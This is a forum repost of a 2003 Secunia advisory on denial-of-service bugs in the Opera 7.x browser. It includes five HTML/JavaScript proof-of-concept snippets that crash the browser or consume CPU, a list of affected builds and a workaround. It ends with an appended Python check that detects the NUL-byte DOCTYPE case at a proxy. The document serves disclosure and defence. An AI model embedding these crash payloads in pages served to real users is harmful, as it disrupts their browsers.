Opera Dos Danger
Posted: Tue Jul 01, 2003 10:29 pm
http://www.secunia.com/advisories/9156/
Release Date: 2003-07-01
Critical: Not critical
Impact: DoS
Where: From remote
Software: Opera 7.x
Description:
Multiple DoS (Denial of Service) issues have been reported in the Opera browser.
A malicious person can exploit these to either crash the browser due to some NULL pointer dereference bugs or in some cases make it consume vast amounts of CPU resources.
The following five examples were provided in the original advisory:
#1
<!DOCTYPE[NULL byte]A>
#2
<form></form><script>document.forms[0].submit()</script>
#3
<table>
<tr id="crash" style="display:inline"><td>
<script>crash.style.display = "none";</script>
</td></tr>
</table>
#4
<table>
<map id="crash" style="position:absolute"></map>
<script>crash.style.height = crash.style.width = '0';</script>
</table>
#5
<html>
<head>
<style type="text/css">
<!--
.aaaaa:after{content:"A";display:block}
.bbbbb{display:run-in}
.ccccc{display:inline-block}
//-->
</style>
</head>
<body>
<div class="aaaaa">
<div class="bbbbb">
<div class="ccccc">
</div>
</div>
</div>
</body>
</html>
The issues have been reported in the following versions for Windows:
7.11b build 2887
7.11 build 2880
7.10 build 2840
7.03 build 2670
However, Secunia has also been able to confirm the issues in version 7.11 for Linux. Prior versions may also be affected.
Solution:
If regarded as a security threat, all issues except #1 can be eliminated by disabling JavaScript support and the setting "Author mode by default".
Reported by / credits:
imagine and nesumin, :: Operash ::
Archived topic from Iceteks, old topic ID:1033, old post ID:8967
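Issue #1 is the only one the workaround above does not cover, so it would have to be caught before the page reaches the browser, for example at a filtering proxy. The following is an added example, not part of the original advisory or post: a Python check that flags a NUL byte inside a DOCTYPE declaration in a raw response body. The function names, the 1024-byte look-ahead and the sample inputs are assumptions constructed for illustration.

```python
import re

# Start of a DOCTYPE declaration, matched case-insensitively on raw bytes.
DOCTYPE_START = re.compile(rb"<!doctype", re.IGNORECASE)

# Assumed bound on how far to look for the closing '>' of the declaration.
MAX_DECL_LEN = 1024


def find_nul_in_doctype(body: bytes) -> list:
    """Return the byte offsets of every NUL found inside a DOCTYPE declaration."""
    hits = []
    for m in DOCTYPE_START.finditer(body):
        window = body[m.end():m.end() + MAX_DECL_LEN]
        end = window.find(b">")
        # Unterminated declaration: inspect the whole window instead of skipping it.
        decl = window if end == -1 else window[:end]
        hits.extend(m.end() + i for i, byte in enumerate(decl) if byte == 0)
    return hits


def should_block(body: bytes) -> bool:
    """Decision a filter would act on: True if any DOCTYPE contains a NUL byte."""
    return bool(find_nul_in_doctype(body))


# Constructed sample bodies (not captured traffic).
SAMPLES = {
    "clean": b"<!DOCTYPE html><html><body>ok</body></html>",
    "issue1": b"<!DOCTYPE\x00A>",
    "lowercase": b"<html><!doctype html \x00 PUBLIC>",
    "nul_elsewhere": b"<!DOCTYPE html><body>\x00</body>",
    "unterminated": b"<!DOCTYPE html\x00",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        offsets = find_nul_in_doctype(body)
        print(f"{name:14} block={bool(offsets)} nul_offsets={offsets}")
```

The check works on raw bytes on purpose: decoding the body to text first can drop or replace the NUL and hide the condition being looked for.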